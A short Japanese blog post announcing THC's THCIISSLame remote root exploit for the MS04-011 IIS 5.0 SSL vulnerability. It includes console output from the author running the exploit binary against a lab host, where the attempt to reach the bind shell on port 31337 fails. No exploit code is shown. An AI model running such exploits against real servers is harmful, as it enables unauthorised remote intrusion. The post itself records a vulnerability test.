MS04-011 THCIISSLame.exe
THCIISSLame 0.1 - IIS 5 SSL remote root exploitということでTHCよりリリース。寝ようと思ったらけんさんのところで発見(^^; [Full-Disclosure]でも上がっていたが自宅には届いていない。最近メールが届かないなぁと思っていたけど...単なる遅延でなくてMLから除外されているのかなぁ。一時期サーバーが止まっていたらしいので。ちなみに攻撃に成功すると31337に接続できる模様。検証のモノは手抜きマシンなので...(汗
C:\temp>THCIISSLame.exe 192.168.1.15 THCIISSLame v0.1 - IIS 5.0 SSL remote root exploit tested on Windows 2000 Server german/english SP4 by Johnny Cyberpunk (jcyberpunk@thc.org) [*] building buffer [*] connecting the target [*] Exploit send successfully ! Sleeping a while .... [*] Trying to get a shell can't connect to port 31337 ;( maybe firewalled ...
追記:↓検証結果が出てます。